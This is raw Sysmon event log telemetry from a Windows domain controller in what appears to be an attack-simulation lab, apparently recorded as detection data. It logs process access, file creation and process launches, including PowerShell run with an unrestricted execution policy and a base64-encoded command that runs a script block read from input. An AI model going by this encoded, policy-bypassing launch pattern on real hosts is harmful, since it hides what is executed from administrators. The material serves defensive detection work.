10341000x8000000000000000388Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000387Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000386Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-851A-5FCF-D602-000000009001}5040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000385Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-8519-5FCF-D402-000000009001}38164804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-851A-5FCF-D602-000000009001}5040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FFA6832CBBF) 154100x8000000000000000384Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.612{10ACEC4A-851A-5FCF-D602-000000009001}5040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\4so5fo5s.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8519-5FCF-C3B8-100000000000}0x10b8c30HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000383Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.602{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\4so5fo5s.cmdline2020-12-08 13:52:26.602 11241100x8000000000000000382Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:52:26.602{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\4so5fo5s.dll2020-12-08 13:52:26.602 10341000x8000000000000000381Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.134{10ACEC4A-8519-5FCF-D102-000000009001}48362632C:\Windows\system32\conhost.exe{10ACEC4A-851A-5FCF-D502-000000009001}4484C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000380Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000379Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000378Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000377Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000376Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000375Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.134{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000374Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.118{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000373Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.118{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000372Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.118{10ACEC4A-83B9-5FCF-0C00-000000009001}4801124C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000371Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.118{10ACEC4A-83AA-5FCF-0500-000000009001}640760C:\Windows\system32\csrss.exe{10ACEC4A-851A-5FCF-D502-000000009001}4484C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000370Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.118{10ACEC4A-8519-5FCF-D402-000000009001}38164804C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-851A-5FCF-D502-000000009001}4484C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd2d2519(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc773123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc772df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd2246d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc73398a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc791e59(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7754be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7754be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc77534f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7672d4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc773807(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc7733fa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc773123(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc772df4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bd2246d9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc759c55(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+bc759225(wow64) 154100x8000000000000000369Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.132{10ACEC4A-851A-5FCF-D502-000000009001}4484C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8519-5FCF-C3B8-100000000000}0x10b8c30HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{10ACEC4A-8519-5FCF-D402-000000009001}3816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000368Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:26.118{10ACEC4A-83B6-5FCF-0B00-000000009001}8602820C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000367Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 